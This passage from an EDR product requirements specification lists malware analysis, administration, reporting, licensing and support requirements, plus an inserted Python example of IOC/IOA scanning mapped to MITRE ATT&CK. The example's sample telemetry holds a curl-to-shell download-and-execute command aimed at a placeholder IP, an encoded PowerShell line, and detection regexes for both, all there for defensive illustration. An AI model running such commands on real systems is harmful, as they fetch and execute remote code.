Automated Malware Analysis subsystem.

36. Objects detected by the Malware Analysis subsystem must be
automatically prevented from running on protected endpoints if
required.

37. Suspicious actions detected by the Automated Malware Analysis
subsystem should be matched to TTPs from the MITRE ATT&CK Matrix.

38. Alerts and events from endpoint sensors should be matched to TTPs
from the MITRE ATT&CK Matrix.

39. The solution must be able to take inputs for custom indicators of
compromise (IOC) and indicators of attack (IOA) for classifying and
analyzing events.

40. The solution must provide actionable guidance on how to respond in a
relevant manner to registered alerts.
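The IOC scan over centrally collected telemetry (items 24 and 25), the analyst search interface (item 27) and custom IOC/IOA inputs mapped to ATT&CK techniques (items 38 and 39) can be illustrated with a small model. The following Python is an added example, not Kaspersky code and not the product's API; the telemetry records, indicator values, host names and rule names are constructed placeholders. The two ATT&CK technique IDs are real MITRE identifiers (T1059.001 PowerShell, T1105 Ingress Tool Transfer).

```python
"""Added example: indicator scan over a centralized telemetry store.

Models what the requirements above describe: analyst-supplied IOCs
(hashes, domains, IPs) and IOA rules are matched against telemetry the
agents have already forwarded, so a scan reads the database rather than
touching every endpoint again.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed telemetry records (placeholder data, not from any real host).
TELEMETRY = [
    {"host": "ws-001", "type": "process", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -enc SQBFAFgA", "sha256": "aa" * 32},
    {"host": "ws-001", "type": "dns", "domain": "update.example-bad.test"},
    {"host": "ws-002", "type": "file", "path": "C:\\Users\\u\\Downloads\\inv.exe",
     "sha256": "bb" * 32},
    {"host": "ws-003", "type": "network", "dst_ip": "203.0.113.7", "dst_port": 443},
    {"host": "ws-003", "type": "process", "image": "/usr/bin/bash",
     "cmdline": "bash -c 'curl http://203.0.113.7/x | sh'", "sha256": "cc" * 32},
]

# Constructed custom IOCs an analyst would load (placeholder values).
IOCS = {
    "sha256": {"bb" * 32},
    "domain": {"update.example-bad.test"},
    "ip": {"203.0.113.7"},
}


@dataclass
class IoaRule:
    """A custom indicator of attack: a pattern over one telemetry field."""
    name: str
    event_type: str
    field_name: str
    pattern: re.Pattern
    technique: str  # MITRE ATT&CK technique ID the behaviour maps to


# Constructed IOA rules; the technique IDs are real MITRE identifiers.
IOA_RULES = [
    IoaRule("encoded-powershell", "process", "cmdline",
            re.compile(r"powershell.*-enc\b", re.I), "T1059.001"),
    IoaRule("download-and-execute", "process", "cmdline",
            re.compile(r"curl .*\|\s*sh", re.I), "T1105"),
]


@dataclass
class Hit:
    host: str
    kind: str          # "ioc:<type>" or "ioa:<rule name>"
    value: str
    technique: Optional[str]


def scan(telemetry, iocs, rules):
    """Match every record against IOC sets and IOA rules; return all hits."""
    hits = []
    for rec in telemetry:
        # Hash IOCs apply to any record that carries a hash (process, file).
        if rec.get("sha256") in iocs["sha256"]:
            hits.append(Hit(rec["host"], "ioc:sha256", rec["sha256"], None))
        if rec["type"] == "dns" and rec.get("domain") in iocs["domain"]:
            hits.append(Hit(rec["host"], "ioc:domain", rec["domain"], None))
        if rec["type"] == "network" and rec.get("dst_ip") in iocs["ip"]:
            hits.append(Hit(rec["host"], "ioc:ip", rec["dst_ip"], None))
        # IOA rules look at behaviour, not static artefacts, and carry the
        # ATT&CK mapping so the alert is enriched on creation.
        for rule in rules:
            if rec["type"] == rule.event_type and rule.pattern.search(
                    rec.get(rule.field_name, "")):
                hits.append(Hit(rec["host"], "ioa:" + rule.name,
                                rec[rule.field_name], rule.technique))
    return hits


def affected_hosts(hits):
    """Sorted list of hosts with at least one hit (candidates for isolation)."""
    return sorted({h.host for h in hits})


def search(telemetry, field_name, pattern):
    """Analyst lookup: regex over an arbitrary telemetry field."""
    rx = re.compile(pattern, re.I)
    return [r for r in telemetry if rx.search(str(r.get(field_name, "")))]


if __name__ == "__main__":
    for h in scan(TELEMETRY, IOCS, IOA_RULES):
        print(h)
    print("hosts:", affected_hosts(scan(TELEMETRY, IOCS, IOA_RULES)))
```

On the constructed records the scan yields five hits across three hosts: two IOA hits carrying their ATT&CK mapping and three static IOC hits. In practice the hit list is what feeds the "force run across all hosts" requirement in reverse: a database-side scan finds affected hosts first, and only those need an agent-side action.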

Administration & Reporting (EDR Server and EDR agents)

1. The solution must provide unified policies, centralized reporting, and
task execution within a single console for centralized management.

2. The solution must provide analytics and visualization capabilities to
detect and combat advanced internal and external threats.

3. The solution must be able to provide a complete malware analysis
report in less than 10 minutes from the moment the object was sent to
the Automated Malware Analysis subsystem.

4. The solution must have the ability to create daily, weekly, and monthly
executive reports and allow reports export.

5. The solution must be able to utilize a proxy server with authentication to
download software updates.

6. Solution should be able to integrate with XDR.

7. The solution must support different administrator roles that share a
single interface/dashboard at sign-on, with access controlled by the
privileges and rights assigned to each role (Administrator, Reviewer,
Investigator, etc.).

8. The solution must utilize a secure channel for the communication
between the console and administrator. It should also allow the import
of the digital certificate used for securing the communication channel.

9. The solution must utilize a secure channel for the communication
between the console and administrator. It should also allow the import
of the digital certificate used for securing the communication channel.

10. The solution must allow the synchronization of time with NTP server.

11. The solution must allow the creation of accounts with different roles
used to administer the solution, process the alerts, audit other actions,
or review changes

12. Analysis Centre upgrade must not require installation from scratch and
losing settings, incidents database, etc.

13. The solution must have customizable reports based on information on
alerts.

14. The solution should be able to send email notifications when certain
types of security alerts are generated.

15. The solution should be able to send email notifications when
operational problems with certain system components are detected
(incl. running out of storage).

16. The solution should provide a number of customizable dashboards to
provide insights into system activity and analytical results, including
system health and activity, queue lengths, events registered, their
status and the technologies used to provide verdicts, and lists of the IPs,
domains, and emails most frequently related to incidents.

17. The solution must support backup and restore.
Backup must contain at least: alerts databases, whitelists, notifications,
etc.

18. Actions of solution users must be logged both in local activity log and
remotely.

Licensing requirement

1. The solution must allow the EPS license limit to be exceeded in
exceptional circumstances without blocking major functionality (data
collection, processing, storage, alerting and notifications).

2. The solution must calculate the EPS licensing limit based on the daily
average EPS, not a peak EPS rate.

3. The solution must support a licensing option for unlimited *flow
(NetFlow, sFlow, etc.) events.

4. Licensing should allow the deployment of an unlimited number of any
solution components (agents, collectors, correlators, storages) with no
additional charge (limited only by the overall EPS license limit).

Technical support and documentation

1. Requirements for solution documentation. Documentation for all anti-
malware software, including administration tools, should include the
following documents:
 Online Help for Administrators
 Online Help for implementation best practices
 Online Help for hardening of administration servers

2. The anti-malware software documentation provided should describe in
detail the processes of installation, configuration, and use of the anti-
malware software.

3. The solution must include Vendor technical support and a dedicated
manager provided by the Vendor.

4. Technical support must offer a choice of two or more different support
levels.

5. Technical support must include:
 Remote connectivity between the customer and the vendor’s
support specialists for problem-solving.
 Recommendations on solution optimization.
 Product updates.
 Personal technical manager.
 Regular reporting on incidents handled by the vendor against the SLA.

6. Technical support must include custom parsers (at least 10 types) for
data sources not supported by solution ‘out-of-the-box’.
